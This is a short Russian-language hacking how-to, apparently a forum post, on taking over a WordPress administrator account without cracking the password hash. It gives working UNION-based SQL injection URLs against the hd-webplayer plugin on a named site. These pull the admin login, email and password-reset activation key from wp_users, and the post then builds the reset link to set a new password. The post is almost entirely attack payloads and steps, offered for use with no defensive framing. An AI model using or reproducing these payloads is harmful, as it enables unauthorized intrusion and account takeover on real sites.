Получаем доступ в админку Wordpress без расшифровки хэша
Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
Но я понял как входить в панель без ожидания расшифровки хэша.
Покажу на примере.
У нас есть блог, где мы уже вывели данные из таблицы wp_users.
Торопится выводить пароль не стоит, выведем e-mail администратора:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
И результат запроса:
admin:[email protected]
Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).
Вводим e-mail администратора который мы получили выше, и отправляем письмо.
Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
Делаем такой запрос:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
И в результате мы получаем активационный код:
P6rd7g1bPW28zgbPCRtZ
Теперь идем на страницу сброса пароля (При этом заполнив параметры):
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.
Далее привычная авторизация.
Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().
